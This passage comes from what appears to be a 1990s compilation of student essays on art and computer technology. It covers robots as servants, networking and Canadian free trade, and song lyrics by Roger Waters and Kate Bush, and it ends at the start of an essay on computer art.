cooling, lighting, +security alarms,and ventilation and light control. Soon they'll +be able to crack our eggs in the morning without any +tecno-anarchy. They'll be adapted to more and more things become +our robot slaves that we will train and house break. +As we get used to the luxury of having slaves we may want them +around for companionship as well . The thought of haveing +Robo-dogs and Robo-cats that responds to human voices a companion +without the kitty litter. "What a concept!" +Better yet I found another insightful thought found in the same +article by Arthur C.Clarke where he uses Joseph Engelberger idea +of a robot resume . He believes these artificial intelligence +beings will become undersea explorers, heavy construction +workers, crime figurers nuclear power plant inspectors, cybernete +companies and astronauts. Here's a sample of his robot resume: + + + + -------------------------------------------------------------- +RESUME +Name: Universon Robot +Social Security Number: None +Marital Status: N/A +Age: 58 years old +Sex: Three choices (male, female, asexual) +Height: 5 feet +Weight: 60 to 2,800 pounds (depending on job requirements) +Present Health: Excellent +Medical History: Lost hand (now replaced) in a forge accident; +lost memory (restored by tape); blinded in a kiln explosion (new, +improved stereoptic vision since installed) +Life expectancy: 29 man-shift years +Special ability/Training: Industrial/heavy-duty outdoors model: +Fluent in three robot languages; instantly retrainable with +memory replacement module; three-jointed arm has 6 degree of +movement and is capable of lifting up to 2,000 pounds with one +end effector (hand). Precise-can work within a tolerance of +1/1000 of an inch; works 24-hour shifts. +Personal model: Available in either stationary or mobile +configurations; can learn to respond to owner's voice; comes with +Level 1 Conscience, the program of protective ethics, factory +installed (not available in warrior mode). +Work Experience: Assembly-line worker, welder, painter- Ford, +General Motors, +Materials handling-Pittsburgh Plate Glass +Domestic-Engelberger household, Danbury, Connecticut +Operating room nurse/attendant-Long Beach Hospital, Long Beach, +California +References supplied upon request + + + + So where does this leave us ? The thought of having a +race of robots which are exactly like humans with the only +difference they're less subject to mental and physical disease +and are made of metal (recycled metal) or whatever. Is it +possible that these human robots could become immortal? To +answer that , it seems anything is possible in the future of +technology only I wonder about our future as a human race. +So far globally we're deteriorating but in order to move forward +it seems we'll have to make alterations to educate ourselves to +progress. + + + + I ask ,"What is progress?." A question,that's always +puzzled me. I guess that everyone must try to kick the habit and +evaluate our values and priorities in the way technology is being +designed and applied. But then technological change is controlled +by few people dedicated to maximizing efficiency for competitive +gain. Yet, population is increasing and I can see a viscious +technological circle occuring. In time, if this unwinds and +takes effect in the next generation, we would have more time to +educate ourselves to a much broader range of educational choices +in which we have access communication and information that can be +transmitted all in our finger tips.At first it's like finding a +new toy then learning how its used. + Also I can see how psychologically some of us can become +completely obsessed to the computer screen and not be able to +function normally without it. Is this where the human race is +heading? This will bring in a whole new stream of jobs into +psychological technology, speach therapy, to optometrists as our +eye sight weakens. + This wonderful technology called progress +seems to let out a lot of bug, causing our physical and mental +bodies to diminish due to long hours of sitting in front of a +computer screen accomplishing nothing, to sitting long hours of +accomplishing something. Then to watch ones documents disappear +from your very eyes. Of course this, so call PROGRESS doesn't +always provide such mental and physical strain. +A wise preacher once said "believe in yourself." he also adds +not only to believe in ourselves but also our sense of what is +important, and to use that as our guide in our working and living +environment in the industrial era. One thing I'II add which +makes life so much easier is to SAVE !! SAVE!! SAVE!! + + +---------------------------------------------------------------- + + + +Enter + + +In order to start this essay I had decided to answer a question +from the course outline:" Have we all become artist" ? This +question will enable me to focus my attention,and allow my +imagination to grabe hold of the implications of such a thought +and fallow it into the latest frontier of computer technology. +this essay is part of the requirements for the Arts and +Technology class. The class covers in part , practical +applications of contemporary computer technology. And, as a +Visual Artist I will attempt to give my interpretation of this +perceived relationship between the two. This is the first of - +short essays concerning my journey as anew and impressionable +technowiener entering into cybrospace. + The question of whether we +have become all Artiste, implies, that we have been empowered by +reason imparted to us by contemporary technology. With this +evolution of computer technology it seems to be the next medium +for the Artist to adopt. Be it push button or voice-command, +mass-consciousness has finally delivered us too the window's of +cybrospace and virtual reality. Since the nifty 50's the +Modernist attitude has had mainstream society pinning away for +great technological advancements and now we're at a threshold. +However, we are but lowly Pilgrims entering a little knower and +yet created frontier + The implications still remains the same that technology could +some how induce a type of metamorphose on the human rase and +transform them into Artistes. However, I am of the belief that it +is a combination of imagination, inquisitiveness, self-awareness, +craft and discipline that aspires us as Artiste; furthermore, +creativity is an inherent human characteristic and not a +technological induced function. Perhaps our imaginations will be +further seduced by this technology; thus , limiting or even +debasing our awareness of reaction to sensation, and then , +giving way to a belief that : With computer technology therefore +I am. + +The Good + + + The demand for +information and communication is on the rise as more and more +people discover the tremendous potential of computer networking. +This resent development in technology +has the capability of providing a new faster and more +versatile way of accessing and communicating information. With +more computer sights coming on line and appearing throughout the +world more people now will have access to a larger base of +information. A medium seemingly designed for the politicaly +correct 90's. + In this age of political correctness a powerful information +and communication medium has the potential of being a fantastic +tool in fostering relationships within your own region through +either Freenet service or a more international server like +Internet. The methods of communicating with someone can be either +by e-mail, direct connection to the person or persons and by +posting messages on a community or special interest bolten +boards, what ever the method chosen it will be a more convenient +one. + + The fantastic wealth of information sights available to us +from around the world has given us a form witch to unit people +global. +This ability to share knowledge in areas of Education, Arts, +Technology, Medicine ...etc,etc, simple by making computer files +accessible to anyone is a great development from this +technology.Gaining access is simple made by going through +directories like Archie and by Database or by simple posting your +quires on a community bulletin board, either method usually +yields the desired information on possible communication sights. + The befits from computer networking has set the tone for new +Conventions by creating a new faster more versatile way of +accessing and communicating information. However, the most +important development from this technological innovation is its +accessability. The ability to log into a computer, be it public +or private, and access information from other sights around the +world has finally turn the have notes into the haves. I can only +hope that people will take the time and nurture this new +technology not just control it. + + + The Bad + + The latest in technological +advancements made in the area of communication and +information services is awe-inspiring. A most hypnotic vision of +seemingly endless possibilities awaits us in cybrospace. Snap out +of it! Don't fall, under the trance of this hypnotist, you don't +even know who he or she is let alone know if their really. Lets +get back to Canada's economic problems; for example, how about +the Federal and Provincial fiscal restraint policies and the Free +Trade deals. After all, universality of social programs and +Canada's sovereignty are important issues much more than what the +latest computer technology has to offer or is it? + Perhaps there is an important link between Canada's current +economic problems and policies that involves technology related +to cybrospace. The Free Trade agreement between Canada and United +states plus the possibilities of NAFTA agreement with Mexico +could be seen in relationship with the latest computer networking +capabilities and The New World Order. The connection between the +latest development in the information communication technology is +part of a Global Infrastructure that connects us with other +market places and trading blocks. Furthermore, the market place +will no longer be confined to simple geographic areas and this +intern will mean more of a Global economy; thus , the once known +Multinational companies are now known as Global companies.This +implies that companies will have greater flexibility in regards +to development and being more transitory. This method of doing +business has been made possible by technology like +Telex-radio-computer networking links. + What free trade agreements do for Global companies and there +subsidiaries is eliminate trade barriers between respective +trading partners. With trade barriers down outside investors can +have a great influence on the sovereignty of host country; for +example, by claiming unfair trading practices do to particular +Federal or Provincial past or future policies. Which brings us to +the most often herd phrase of the 90's "We have to become more +globally competitive". And we have already seen some examples of +streamlining and its effects: Down sizing of operations , wage +rollbacks, and the threatened Universality of social programs +plus meany others. + The connection has been shown to be made between Canada's +economic and Sovereignty woes and the latest in computer +technology has made it possible for Governments and Global +campiness to manipulate and create a New World Order of polices +and procedures. The solution to Canada's present problems and +future self determination is not only being able to use the same +technology but rather the need for investment into Canada as +future leader in development of technology. + The Ugly + + The creative powers formed by the imagination and +intuition with its amidiate understanding with out reason has +brought me to this finaly essay topic : Contempoary music +regarding communication technology and how people relait to it. I +remembered the recording by Roger Water's, Radio K.A.O.S from +1986 and Kate Bush's song, Deeper Understanding from her 1989 +recording of: Sensual World. Both artist approach on +communication/computer technology as being trivealized by +societies consumerist attitude and their excessive +preoccupations. + As I read the lyrics from the song : Deeper Under Standing by +Kate Bush I can relaity to what she is saying and can imagine how +people can slowly withdrawly from society and become introverted. +Here are the lyrics from from Kate Bush's song: Deeper Under +Standing. + +As the people here grow colder +I turn to my computer +And spend my evenings with it +Like a friend. +I was loading a new programme +I had ordered from a magazine: + +"Are you lonely, are you lost? +This voice console is a _must_." +I press Execute. + +"Hello, I know that you've been feeling tired. +I bring you love and deeper understanding. +Hello, I know that you're unhappy. +I bring you love and deeper understanding." + +Well I've never felt such pleasure. +Nothing else seemed to matter. +I neglected my bodily needs. +I did not eat, I did not sleep, +The intensity increasing, +'Til my family found me and intervened. + +But I was lonely, I was lost, +Without my little black box. +I pick up the phone and go, Execute. + +"Hello, I know that you've been feeling tired. +I bring you love and deeper understanding. +Hello, I know that you're unhappy. +I bring you love and deeper understanding." + +I turn to my computer like a friend. +I need deeper understanding. +Give me deeper understanding. + + In Kate's song : Deeper Understanding, I can +sight a good example of Ipeople becoming infatuated with the +seemingly endless possibilities of computer technology. The +assienment in part given to our computer class was to connect +with telnet and then into Media Moo. From inside Media Moo we +were expected to explore and communicat with other users in this +text-based vertual reality. Once you have become acustom to the +program's of navigating, interacting with various tools, objects, +the more ingaged you become. You seem to be cought up in the +interaction and the dialouge with other users and the archutects +of this virtual reality you find it hard to leave. And, the +potential of computer programs becoming an obsession and a +safe environment is quiet real. The obsservation by Kate Bush, +maybe simple ; nevertheless, there is alot to the line ,"give me +a deeper understanding," and how we are driven by it. + The concept recording of Radio Kaos by Roger Waters has +expressed how telecommunication/computer technology has been used +to trivualize or control our daily lives. Here is the lyrics for +Roger Waters Radio K.A.O.S: + Author: Roger Waters + + +Benny is a Welsh coal miner. He is a radio ham. He is 23 years +old, married +to Molly. They have a son, young Ben, aged 4, and a new baby. +They look after +Benny's twin brother Billy, who is apparently a vegetable. The +mine is closed +by the market forces. The Male Voice Choir stops singing, the +village is dying. + +One night Benny takes Billy on a pub crawl. Drunk in a +brightly-lit shopping +mall, Benny vents his anger on a shop window full of multiple TV +images of +Margaret Thatcher's mocking condescension. In defiance, he +steals a cordless +'phone. Later that night, Benny cavorts dangerously on the +parapet of a +motorway footbridge, in theatrical protest at the tabloid press. +That same +night, a cab driver is killed by a concrete block dropped off a +similar bridge. + The police come to question Benny; he hides the cordless 'phone +under the +cushion of Billy's wheelchair. +Billy is different, he can receive radio waves directly without +the aid of a +tuner; he explores the cordless 'phone, recognizing its +radioness. +Benny is sent to prison. Billy feels as if half of him has been +cut off. He +misses Benny's nightly conversations with radio hams in foreign +parts. Molly, +unable to cope, sends Billy to stay with his Great Uncle David, +who had +emigrated to the USA during the war. Much as Billy likes Uncle +David and the +sunshine and all the new radio in LA, he cannot adjust to the +cultural upheaval +and the loss of Benny, who for him is 'home'. +Uncle David, now an old man, is haunted by having worked on the +Manhattan +project during World War II, designing the Atom Bomb, and seeks +to atone. He +also is a radio ham; he often talks to other hams about the Black +Hills of his +youth, the Male Voice Choir, about home. He is saddened by the +use of +telecommunication to trivialise important issues, the soap opera +of state. +However, Live Aid has decynicised him to an extent. Billy +listens to David and +hears the truth the old man speaks. +Billy experiments with his cordless 'phone, he learns to make +calls. He +accesses computers and speech synthesizers, he learns to speak. +Billy makes contact with Jim a DJ at Radio KAOS, a renegade rock +station +fighting a lone rear guard action against format radio. Billy +and Jim become +radio friends, Reagan and Thatcher bomb Lybia. Billy perceives +this as an act +of political "entertainment" fireworks to focus attention away +from problems at +"home". +Billy has developed his expertise with the cordless 'phone to the +point where +he can now control the most powerful computers in the world. He +plans an +"entertainment" of his own. He simulates nuclear attack +everywhere, but +compassion. In a SAC bunker a +soldier in a white cravat turns a key to launch the counter +attack. Nothing happens; impotently he kicks the console, +hurting his foot. He watches the +approaching blips on the radar screen. As impact approaches, he +thinks of his +wife and kids, he puts his fingers in his ears. +Silence. White out. Black out. Lights out. It didn't happen, +we're still +alive. Billy has drained the earth of power to create his +illusion. +All over the dark side of the earth, candles are lit. In the pub +in Billy's +home village in Wales one man starts to sing; the other men join +in. +The tide is turning. +Billy is home. + + +Jim: This is K.A.O.S. You and I are listening to KAOS in Los +Angeles. Let's +go to the telephones now and take a request. +Billy: Hello, I'm Billy. +Jim: Yes? +Billy: I hear radio waves in my head. +Jim: You hear radio waves in your head? Ah! Is there a request +that you have +tonight for KAOS? + +Radio Waves +------------ + +Radio waves. Radio waves. +He hears radio waves. Radio waves. +The atmosphere is thin and cold +The yellow sun is getting old +The ozone overflows with radio waves +AM, FM, weather and news +Our leaders had a frank exchange of views +Are you confused, radio waves. + +Radio waves, radio waves +AM radio waves, FM radio waves +Radio waves, mind-numbing radio waves +Fish-stunning radio waves +Radio waves. + +Magic Billy in his wheel chair +Is picking up all this stuff in the air +Billy is face to face with outer space +Messages from distant stars +The local police calling all cars, radio waves + +Hear them radio waves, radio waves +Jesus saves radio, radio waves +adio waves, AM radio waves, FM radio waves +All them radio waves + +Radio waves, radio waves, he hears radio waves +Radio waves, radio waves, hopeful radio waves, dopeful radio +waves +Radio waves, Russian radio waves, Prussian radio waves +Eastern radio waves, Western radio waves +Testing radio waves, one two. One two. +Radio waves. Getting through to you +More code radio waves, Tobacco road radio waves +South to Paloma radio waves, Oklahoma City radio waves +Sitting pretty radio waves, nitty-gritty radio waves +Radio waves + +Jim: Alright, that's a song called Radio Waves. You are +listening to KAOS in +Los Angeles and we've got Billy on the line. +Billy: I'm from the valleys. +Jim: You're from the valley? +Billy: No, Jim you schmuck, the Valleys; male voice choirs, +Wales. +Jim: Ah, you're from Wales! Now is this sperm or blue-tip? +Billy: Ha, ha, ha, ha. Very funny Jim. +Jim: Sorry. +Billy: Me and Benny went out. +Jim: Who's Benny? + +Who Needs Information +---------------------- + +Me and Benny went out last night +Looking for fun +Supping ale in the moonlight +Waiting for the dawn to come +Benny pointed at a HiFi shop +He said hey man look at all the stuff they've got +How'd you make a have out of a have not +Hmmmm. +Who needs information +When you're working underground +Just give me confirmation +We could win a million pounds + +Benny climbed up on a footbridge +And he teetered on the parapet +He said can you see the whites of their headlights +Are they coming yet + +Who needs information +This high off the ground +Just give me confirmation +We could win a million pounds + +Who needs information +When you're living in constant fear +Just give me confirmation +There's some way out of here +Some way out of here + +Benny hefted a breeze block +And tried to let go +Got hung up on a tear drop +So me and Benny went home + +Who needs information +When you're living in constant fear +Just give me confirmation +There's some way out of here +Some way out of here + +Who needs information yeah +When you're living on borrowed time +Just give me confirmation +There will be a winner this time + +Who needs information when you're working underground +Just give me confirmation +We could win a million pounds +Who needs, who needs, who needs information +This high off the ground +Just give me confirmation +We could win a million pounds - yeah + +Jim: Um. +Jim lights a cigarette. +Jim: So your brother's in jail? + +Me or Him +---------- + +You wake up in the morning, get something for the pot +Wonder why the sun makes the rocks feel hot +Draw on the walls, eat, get laid +Back in the good old days + +Then some damn fool invents the wheel +Listen to the whitewalls squeal +You spend all day looking for a parking spot +Nothing for the heart, nothing for the pot + +Benny turned the dial on his Short Wave radio +Oh how he wanted to talk to the people, +he wanted his own show +Tune in Moscow. Tune in New York +Listen tot the Welsh kid talk +Communicating like in the good old days + +Forgive me father for I have sinned +It was either me or him +And a voice said Benny +You fucked the whole thing up +Benny your time is up +Your time is up + +Benny turned the dial on his Short Wave radio +He wanted to talk to the people +He wanted his own show +Tune in Moscow. Tune in New York +Listen to the Welsh kid talk communicating +Like in the good old days + +Forgive me Father +Welsh Policeman: Mobile One Two to Central. +For I have sinned +Welsh Policeman: We have a multiple on the A465 +between Cwmbran and Cylgoch. +Father it was either me or him. +Father can we turn back the clock? +Welsh Policeman: Ambulance, over. +I never meant to drop the concrete block. +Welsh Policeman: Roger central, over and out. + +Benny turned the dial on his Short Wave radio +He wanted to talk to the people +He wanted his own show +Tune in Moscow. Tune in New York +Listen to the Welsh kid talk +Just like in the good old days +The good old days + +Radio announcer: Do you really think Iranian terrorists would +have taken +Americans hostage if Ronald Reagan were president? +Do you really think the Russians would have invaded Afghanistan +if Ronald +Reagan were president? +Do you really think third-rate military dictators would laugh at +America and +burn our flag in contempt if Ronald Reagan were president? +Concerned Citizen: Well, it might work! +Hostage: We as a group do most importantly want to beseech +President Reagan and +our fellow Americans to refrain from any form of military or +violent means as +an attempt, no matter how noble or heroic, to secure our freedom. + +Concerned Citizen: Sure! Only it's going to be mighty dangerous +for you, +Cassidy + +Hoppy's faithful sidekick: guess you don't know Hopalong Cassidy, +Mister. +Adventure's his bread, excitement's his butter and danger, why to +him that's +like strawberry jam to top it off. + +Jim: This is some live rock and roll at KAOS, where rock and roll +comes out of +chaos and a song called "The Powers that Be"... + + +The Powers That Be +------------------- + +The powers that be +They like a tough game +No rules +Some you win, some you lose +Competition's good for you +They're dying to be free +They're the powers that be +They like a bomb proof cadillac +Air conditioned, gold taps, +Back seat gun rack, platinum hub caps +They pick horses for courses +They're the market forces +Nice car Jack +They like order, make-up, lime light power +Game shows, rodeos, star wars, TV +They're the powers that be +If you see them come, +You better run - run +You better run on home + +Sisters of mercy better join your brothers +Put a stop to the soap opera right now +They say the toothless get ruthless +You better run on home + +You better run - run +You better run on home + +The powers that be +They like treats, tricks, carrots and sticks +They like fear and loathing, they like sheep's clothing +And blacked-out vans + +Blacked-out vans, contingency plans +They like death or glory, they love a good story +They love a good story + +Sisters of mercy better join with your brothers +Put a stop to the soap opera state +They say the toothless get ruthless +Run home before its too late +You better run - run +You better run on home + +Billy: Goodnight, Jim. +Jim: Goodnight, Billy. +Uncle David's Great Dane: Woof, woof, woof! + + +The canyon - daytime. Billy plays with Great Uncle David's Great +Dane. +Paraquat Kelly: Bull heads, three red snapper, one pink snapper +and your +Pacific coastal trench hosemonster fish. +Cynthia Fox: Ohhh! At Sky David's juke joint of joy reports, +forty under the +console giggle stick ling cod, twenty-three purple perches four +sledgehammerhead sharks, and what a surprise, eightyfour crabs, +and no red +snappers. +Paraquat Kelly: Hey, and that'll do for the triumphant return of +the fish +report with a beat. +Jim: We think of it as mainstreet, but to the rest of the country +it's Sunset +Strip. You're listening to KAOS in Los Angeles. + + Sunset Strip +------------- + +I like staying with my Uncle Dave +And I like playing with his great dane +But I don't fit +I feel alien and strange Kinda outa range + +I like riding in my Uncle's car +Down to the beach where the pretty girls all parade +And movie stars and paparazzi play +The Charles Atlas kicking sand in the face game + +And I sit in the canyon with my back to the sea +There's a blood red dragon on a field of green +Calling me back + +Back to the Black Hills again +Ooh, ooh, Billy come home + +Billy is searching for his native land +Flicking through the stations with the dial in his head +Picking up -------------- and +A male voice choir on the short wave band + +Billy taps out Jim's number on the 'phone +Sits shaking as he waits for Jim's answering tone +Come on my friend, speak to me please +The land of my fathers is calling to me +And I sit in the canyon with my back to the sea +There's a blood red dragon on a field of green +Calling me back, back to the Black Hills again +Ooh, ooh, Billy come home + +Come on home +He sits in the canyon with his back to the sea +Sees a blood red dragon on a field of green +He hears a male voice choir singing Billy come home +Billy, Billy, come home +Come on home + +Californian Weirdo: I don't like fish. +Jim: You are listening to KAOS here in Los Angeles. +Californian Weirdo: I don't like fish.J +Jim: Yes, we've established that. Ah! Do you have a request? +Californian Weirdo: Shell fish, guppy, salmon, shrimp and crab +and lobster, +flounder.I hate fish, but I think most of all I hate fresh fish, +like trout. I +hate fresh trout. My least-hated, favourite fish would be sole. +That way you +don't have to see the eyes. +Sole has no eyes. +Jim: Oh no! +I'd like to be home with my monkey and my dog +Jim: Thankyou. +I'd like to be home with my monkey and my dog +I'd like to be home with my monkey and my dog +I'd like to be home with my monkey ... +Jim: They don't care. Shut up. Play the record. + +Home +----- + +Jim: Oh, God! +Californian Weirdo: Sole has no eyes. +Could be Jerusalem, or it could be Cairo +Could be Berlin, or it could be Prague +Could be Moscow, could be New York +Could be Llanelli, and it could be Warrington +Could be Warsaw, and it could be Moose Jaw +Could be Rome +Everybody got somewhere they call home +When they overrun the defences +A minor invasion put down to expenses +Will you go down to the airport lounge +Will you accept your second class status +A nation of waitresses and waiters +Will you mix their martinis +Will you stand still for it +Or will you take to the hills + +It could be clay and it could be sand +Could be desert +Could be a tract of arable land +Could be a house, could be a corner shop +Could be a cabin by a bend in the river +Could be something your old man handed down +Could be something you built on your own +Everybody got something he calls home + +When the cowboys and Arabs draw down +On each other at noon +In the cool dusty air of the city boardroom +Will you stand by a passive spectator +Of the market dictators +Will you discreetly withdraw +With your ear pressed to the boardroom door +Will you hear when the lion within you roars +Will you take to the hills + +Will you stand, will you stand for it +Will you hear, ohhhh! ohhh! when the lion within +you roars + +Could be your father and it could be your mother +Could be your sister, could be your brother +Could be a foreigner, could be a Turk +Could be a cyclist out looking for work. Norman +Could be a king, could be the Aga khan +Could be a Vietnam vet with no arms and no legs +Could be a saint, could be a sinner +Could be a loser or it could be a winner +Could be a banker, could be a baker +Could be a Laker, could be Kareem Abdul Jabar +Could be a male voice choir +Could be a lover, could be a fighter +Could be a super heavyweight, or it could be +something lighter +Could be a cripple, could be a freak +Could be a wop, gook, geek +Could be a cop, could be a thief +Could be a family of ten living in one room on relief +Could be our leaders in their concrete tombs +With their tinned food and their silver spoons +Could be the pilot with God on his side +Could be the kid in the middle of the bomb sight +Could be a fanatic, could be a terrorist +Could be a dentist, could be a psychiatrist +Could be humble, could be proud +Could be a face in the crowd +Could be the soldier in the white cravat +Who turns the key in spite of the fact +That this is the end of the cat and mouse +Who dwelt in the house +Where the laughter rang and the tears were spilt +The house that Jack built +Where the laughter rang and the tears were spilt +The house that Jack built +Bang, bang, shoot, shoot +White gloved thumb, Lord thy will be done +He was always a good boy his mother said +He'll do his duty when he's grown, yeah +Everybody's got someone they call home + +Four Minutes +------------- + +Billy: Four minutes and counting. +Jim: O.K. +Billy: They pressed the button, Jim. +Jim: They pressed the button Billy, what button? +Billy: The big red one. +Jim: You mean THE button? +Billy: Goodbye, Jim. +Jim: Goodbye! Oh yes. This ain't au revoir, +it's goodbye! Ha! Ha! +Jim: This is KAOS. It's a beautiful, balmy, Southern California +summer day. +It's 80 degrees ... I said balmy ... I could say bomby ... Ha! +Ha! ...O.K. +I'm Jim and this is Radio KAOS and with only four minutes left to +us, let's use +this as wisely as possible. +Molly: Everybody got someone they call home. +Jim: Out at Dodger Stadium. +It's the bottom of the seventh, the Dodgers are leading +Three to nothing over the Giants, and for those of you who are +looking to go +surfing tomorrow, too bad. +'Phone rings. +Jim: I'm kinda lost in here to tell you the truth ... +O.K. good. Ladies and gentlemen, if the reports that we are +getting are +correct, this could be it. Billy, if you're listening to me, +please call now. + +After a near miss on the plane +You swear you'll never fly again +After the first kiss when you make up +You swear you'll never fly again +After the first kiss when you make up +You swear you'll never break up again +And when you've just run a red light +Sit shaking under the street light +You swear to yourself you'll never drink and drive again +Sometimes I feel like going home +You swear you'll never let things go by again. +Sometimes I miss the rain and snow +And you'll never toe the party line again +And when the east wind blows +Sometimes I feel like going home + +Jim: Billy, if you are listening, please call. +Californian Weirdo: Sole has no eyes. +Molly: Goodbye little spy in the sky. +They say that cameras don't lie. +Am I happy, am I sad, am I good, am I bad? +Jim: Billy, if you're listening, please call. +Californian Weirdo: Sole has no eyes, sole has no eyes +Billy: Ten, nine, eight, seven +Margaret Thatcher: Our own independent nuclear deterrent has +helped to keep the +peace. +Billy: Six, five four, three, +Ordinary Person: ...you've go a job... +Billy: Two, one, +Margaret Thatcher: For nearly forty years +Jim: Goodbye Billy. + +The Tide is Turning (After Live Aid) +------------------------------------- + +I used to think the world was flat +Rarely threw my hat into the crowd +I felt I had used up my quota of yearning +Used to look in on the children at night +In the glow of their Donald Duck light +And frighten myself with the thought of my little ones burning +But oh, oh, oh, the tide is turning +The tide is turning + +Satellite buzzing through the endless night +Exclusive to moonshots and world title fights +Jesus Christ imagine what it must be earning +Exclusive to moonshots and world title fights +Jesus Christ imagine what it must be earning +Who is the strongest, who is the best +Who holds the aces, the East or the West +This is the crap our children are learning +But oh, oh, oh, the tide is turning +The tide is turning +Oh, oh, oh, the tide is turning + +Now the satellite's confused +'Cos on Saturday night +The airwaves were full of compassion and light +And his silicon heart warmed +To the sight of a billion candles burning +Oo, oo, oo, the tide is turning +Oo, oo, oo, the tide is turning +The tide is turning Billy + +I'm not saying that the battle is won +But on Saturday night all those kids in the sun +Wrested technology's sword from the hand of the +War Lords +Oh, oh, oh, the tide is turning +The tide is turning Sylvester + +The tide is turning. + + The story in Radio Kaos imparts to some extent a prevailing +attitud that society has an explotive destructive naiture. +Furthermore, telecomunication and computer technology are seen as +the altmite vehicle for the consumerist attitude and a further +exstention of their excessive preoccupations for self +actualization. + In both Roger Water's and Kate Bush's recordings both have +reflected there concerns over peoples attitudies towards +contemporary technology. Be it the most general of attitudies in +how we relait to one another or how we use exploit the technology +inoder exploit others. This explotive attitude seems to be +inherent part of human kind. + + + +----------------------------------------------------------------- + + +Computer Art Today + +by Tina Sidhu + + The relationship between the artist and the computer is +likely to prove significant not only to the fringe artist and to +the programmer, but to our society as a whole. We live in an +increasingly technological society, the combination of art and +sciences in computer art is a reflection of the times in which we +live. The lives of the artist and programmer will inevitably +overlap more and more, as the computer becomes a more familiar +and widespread influence on our culture. + There is an inevitable range of responses to computer art +ranging from those based on a fear of computers overpowering +traditional human artists, to more optimistic beliefs that +computers will become the most creative and greatest of art +tools. Perhaps some universal computer genius with the skills of +an artist, scientist, programmer and humanist, will change our +traditional attitudes towards art irrevocably, and bring an +entirely new and unique style of art forward. But for ordinary +individuals, like myself, there is no need to wait for critical +agreement. Art is an interpretive subject, and even for myself, +computers provide enough freedom and opportunities for creative +interpretation to make the connection. + Because computer art challenges society s traditional +beliefs about art, segments of the general public and the +artistic community, can be counted on to react with response to +the computer medium. An artist who has not yet delved into this +new technology simply can not comprehend that the computer can be +no more or less a "tool" like the simple paint brush but with +extra advantages. The only difference is that the computer is a +much more complex tool, allowing more options, innovative ideas, +and creative realms. + Prior to forming any sort of opinion regarding computer art +the artist must comprehend the computer's ability to function for +him/her at many different levels. There needs to be an awareness +of the many roles the computer can play. For one artist, it +might be no more than a design aid. A friend of mine in the +visual arts department, for example, finds the computer extremely +valuable to her work as a weaver. She has described to me how +she uses the computer to visualize a fabric before it actually +being woven. As opposed to weaving on graph paper by hand, the +computer removes the automatic color preference found in that +traditional method. Furthermore, by examining computer +illustrations the softening of contours which must otherwise be +seen only after a weaving was removed from the loom, can be +visualized graphically. + In this case, the computer does not threaten the traditional +weaving methods of an artist but improves them considerably. The +artist has more opportunity to be creative and spends less time +with tedious labours, like coloring in each square in a graph by +hand. This allows the weaver time and freedom to experiment and +therefore, more opportunity to be actively creative. For this +reason, the computer is a significant advantage to the artist and +the art of weaving, itself. + The computer offers the artist a vast expanse of areas and +levels available to explore and master. A new integrative +capacity is offered to the artist which can lead into new +artistic approaches that combines it many features. The +combination of artist and oil paint is, for example, a different +statement than that same artist and watercolors. Now, rather +than purchasing oils and paintbrushes from the art supply store, +the computer artist can simply create the tools to be used on the +computer, and combine the effect of different mediums, or +experiment with alternatives. The fact that one can actually +create the tools to be used for an artwork is amazing since the +possibilities it provides, are virtually endless. There are lots +of examples of tools to choose from and the ability to combine a +variety of tools and even mediums into one artwork can prove most +interesting; however, the finished work of art still depends on +the program and the creative abilities of the artist monitoring +the machine, whether it's a scanner, a musical synthesizer, or +any other component. + I've found that some people feel the computer limits the +artist's intuitive response to his/her own unfolding creation and +prevents him/her from leaving any personal trace in the execution +of the artwork. This is due to the fact that the computer artist +has the ability to devise a program which can be suited uniquely +to a specific artistic conception which allows him/her to reject, +accept or modify images as they emerge on screen. However, this +adds to the artist's creative opportunities in a society where +deadlines have to be met and the lack of leisure time is a +serious concern. + It must be understood that there are many different mediums +in the world of art, each to be appreciated in their own right. +Rather than constantly battle over the prominence of sculpture or +oil painting or watercolors, each medium cannot be compared and +should be appreciated for its unique qualities. As well, +computer art should be appreciated as a unique medium itself. +Just because the artist can vary the quality of line and +introduce a variety of colorist effects, does not mean his/her +finished work is unavoidably inferior when measured against an +old renaissance master drawing, in which every line and every +nuance directly reflects its creator's individual response to the +medium. + There could well be more opportunities to view +computer-generated graphics in their proper artistic context. +The creative process is centered in the mind of the artist, like +his/her ability to conceive an idea for an artwork, the actual +process in which the work was executed, is received well when the +results are seen on canvas. It may be interesting to know, but +it is not an effective means to judge the actual art itself. It +is the idea rather than the artist's technical skills of a +particular medium which constitutes the appeal of a sculpture, +painting or drawing. In fact, a sculptor friend of mine had +evidenced that the realization of the artist's mental image can +even occur without their physical involvement or presence. When +considered in this context, I feel that the computer is not a +gimmick but a tool that releases the artist from tedious and +impossible tasks accomplished by hand. + In many ways, the computer as a new artistic tool, parallels +to the emergence of photography as the mechanical medium' of the +nineteenth century. There was considerable debate then as to +whether photography was a medium related to science or art. Many +traditional painters were appalled when subject they spent hours +to recreate by the paintbrush could be reproduced by the camera +in a matter of minutes and still be called art. They refused to +consider these as works of art just as the traditional canvas +painter may not believe the brush tool of the paint program could +possibly match the tool of their own hands. However, many +painters who had enough self-esteem in their own interpretations, +eventually considered the camera as a valuable tool. Such +artists, even today, who deal with this same debate, use the +camera as a tool that can easily record the physical +characteristics of a person, place or object in a form which can +be easily consulted for future reference. Although there is +still controversy over the artistic nature of the photograph, +photography has developed into a creative medium in its own +right. This occurred at the same time the artists came to accept +the photograph as an artistic aid which resulted in it being less +of a threat to the painters. + I find that most of the computer-generated artwork to date +should be considered as a groundwork for a similar type of +development toward a still developing artistic medium, because it +offers so many new directions and potentials. There has already +been experimentation in programming the computer to simulate the +styles of previously existing art, even in the few years that +computers have become widely available. Computer art no longer +is only suited to linear and geometric designs since the +introduction of new programs that offer tonal gradations, +free-hand drawing and even the ability to draw complex monuments +in a landscape setting of precise perspective which have become +possible with computers as well. Even so, I think the computer's +potential as an artist's tool has barely been reached even though +its value in the field of architecture and commercial design has +been acknowledged and utilized. As well, the computer is +currently being utilized in highly creative ways by such programs +as Nintendo, virtual reality, Cyber space and autocad. In other +words, the possibilities of the computer are endless and we have +yet to reach its full potential. I can only imagine what future +computer technology has yet to offer the contemporary artist. + My own interest in computer technology began through +watching my grandfather reconstruct archaeological sites and +their ancient artifacts on the computer. He kept a permanent +record of ancient African artifacts and vessels of the most +extraordinary ceramics dated and at times, reconstructed. New +approaches and the more traditional iconographic studies are both +benefiting increasingly from computerized information retrieval +analysis. By transferring cumbersome photographic archives of +pottery, stele, textiles, site plans, and design inventories onto +computer or laser disks and cross-indexing iconographic motifs +and details of manufacture, form and design, researchers such as +my grandfather are uncovering significant, formerly 